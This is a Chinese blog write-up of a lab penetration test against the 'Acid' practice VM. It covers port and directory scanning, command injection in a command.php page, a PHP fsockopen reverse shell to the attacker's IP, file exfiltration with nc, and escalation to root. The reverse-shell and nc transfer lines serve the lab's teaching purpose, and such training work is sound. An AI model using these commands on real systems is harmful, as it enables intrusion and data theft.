靶机渗透实战-Acid

文章目录

这几天有点事情,靶机方面就没在更新,后边会积极的更新。



信息收集

信息收集是必不可少的.

  • 首先用自己的kali当攻击机,下载acid靶机
    靶机下载地址
  • 首先进行靶机发现
    nmap -sn 192.168.240.1。1/24进行主机发现不尽兴端口扫描(128是kali地址)
    在这里插入图片描述
  • 然后对主机进行端口扫描
nmap -sV -T4 -A -p- 192.168.240.137
其中sV 扫描版本信息和开放的服务 ,
-A扫描开放端口的具体服务

在这里插入图片描述

  • 发现端口33447
    访问之发现是个网站
    在这里插入图片描述
    用dirsearch 扫描目录
    在这里插入图片描述
    没有什么有价值的东西,查看源码
    在这里插入图片描述
    发现/Challenge 访问之,当然题目名是这个
    eee 我没发现

在这里插入图片描述
发现apache版本信息,可以搜索有没有相关cve漏洞之类的

漏洞发现利用

发现是一个登入框
在这里插入图片描述
尝试注入啥的都不行那末继续进行网站目录扫描,ovo 没扫到.
尝试用dirbuster 扫面

  • kali 直接输入dirbuster 打开即可
    用dirsearch 7zscan等没有扫到
    在这里插入图片描述

经目录扫描得到,
Magic_Box/command.php 也是如此不一一列举
在这里插入图片描述

http://192.168.240.137:33447/Challenge/Magic_Box/command.php

发现了一个好东西
在这里插入图片描述
用|进行命令注入 成功!
在这里插入图片描述
利用 sock反弹shell

<?php
$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");

得到php -r '$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url加密
在这里插入图片描述
1nc -lvvp 1234进行监听
成功send 发包成功反弹
在这里插入图片描述
拿到shell

提权

常规思路利用python 进行提权

python -c  "import pty; pty.spawn('/bin/bash')"

在这里插入图片描述
发现需要密码,那就找密码
查看passwd 权限是否可以写入

  • 如果可以写入的话可以添加一个新的具有root权限的账户 输入命令perl -le 'print crypt("pass","aa")' pass是加密的密码, aa表示加密盐如果不使用则默认是md5加密格式.
  • 然后将创建的用户写入passwd 再sudo即可
    这是一种思路,这里却不行
    在这里插入图片描述
    那末换思路
    在这里插入图片描述
    这俩具有root 权限
    查找一下该账户的相关文件
    示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。

查找每个用户的文件

find / -user 2>/dev/null  

2`是标准错误的意思,/dev/null指空设备,表示将标准错误输入到空设备中`

在这里插入图片描述
发现hint.pcapng

用nc来传输文件内

  • 首先使用nc -lvnp 3344> hint.pcapng来监听传输听口
  • 然后在shell中使用nc 192.168.240.128 1234 </sbin/raw_vs_isi/hint.pcapng传输过去
    在这里插入图片描述
    成功接收
    追踪tcp流,发现可以地方 疑似密码
    在这里插入图片描述
    尝试登入1337hax0r
    用户名saman
    然后用sudo -i 提权到root
    在这里插入图片描述

成功!!! 结束

总结

这个学到很多的东西

  • 用php -c进行 反弹shell
php -c "
$sock=fsockopen("192.168.240.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");
"

然后用python -c "import pty;pty.spawn(’/bin/bash’);"进行提权 结合用 find / -user 2>/dev/null 查找关于用户的文件

  • nc url port < 文件名 进行文件传输
  • 用 DirBuster进行目录扫描
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值